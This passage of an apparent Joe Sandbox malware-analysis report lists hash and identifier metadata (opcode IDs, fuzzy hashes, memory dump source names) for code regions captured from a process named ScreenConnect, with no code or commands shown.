                                                                                                                                                                                                                                                          • Opcode ID: 707c936fb2275c9d3c81ca1e5c77d9b1aa96293b29fa1bb5ff579e45379bd92e
                                                                                                                                                                                                                                                          • Instruction ID: 2bbf65fd129c506b18e4ce452621ade78d1ce4f456696859bed3f53bd72cc739
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 707c936fb2275c9d3c81ca1e5c77d9b1aa96293b29fa1bb5ff579e45379bd92e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37D05E2193D98A8EE369FB7548429BE7282EFD4304B95897DD46F931A7DC2CB0144340
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ba6fd01b02bd8c0bdd9254335e2240e4554043acfeedc69876dce93ad32c76b3
                                                                                                                                                                                                                                                          • Instruction ID: 12b323d50edb9d1cb392a65b1ef1096a550478d0a3e1befb7938687168825550
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba6fd01b02bd8c0bdd9254335e2240e4554043acfeedc69876dce93ad32c76b3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1C04C02B6C82D0E64B9A25D74552BC41C1DBD866578912F3E90CD625AEC485C8203C1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bcd4e94ae3c6fb0612130c50aaa26ad7ad3ab39195080452e8284a782a1ce57e
                                                                                                                                                                                                                                                          • Instruction ID: 027d54052a396899559d2cb64bd908e0ae9ad4b17c5488e1e894d8bfc82fa5e8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4e94ae3c6fb0612130c50aaa26ad7ad3ab39195080452e8284a782a1ce57e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D0A72183C58B4ED666EF2088018BE7252AF50300B11867AD46B430A6CC1C74004340
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fe3139d4e6d57a41404a39b693e50d16f481b0787d44143c8fafbd1b6caf191a
                                                                                                                                                                                                                                                          • Instruction ID: a8e9d56b26b5243bafa594a30825cdd4e57fe4dfd52b33c4f6d36b9159815e26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe3139d4e6d57a41404a39b693e50d16f481b0787d44143c8fafbd1b6caf191a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4C01221A1CD494FE279DF29404127921D3AFD82017508779D01EC22A6CD3865114380
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 98dc281f270e623c78ffb0e970ad95971f564c50b57e9397d6bcd54f88970db0
                                                                                                                                                                                                                                                          • Instruction ID: b275b3c48845c171e7a7082e311beb40c1850f915a774ca22bcf8bbaf2f98901
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98dc281f270e623c78ffb0e970ad95971f564c50b57e9397d6bcd54f88970db0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B09221E1CE098A91B99E19100123911D28BA8210720837EC05EC26A6CD68698103C1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 755397bc3a4286c00a5f73a922ce590fd40ff4ea5de25cffab61cb7ac6630182
                                                                                                                                                                                                                                                          • Instruction ID: 9814168b2d89dab17f9af36a39f9b219b3e44aa0f3cf1de76313f44e3f64bc21
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755397bc3a4286c00a5f73a922ce590fd40ff4ea5de25cffab61cb7ac6630182
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FA0026A529A4A5A61C5B57910196B800C3B798695B651479946DC33A2EC1868454300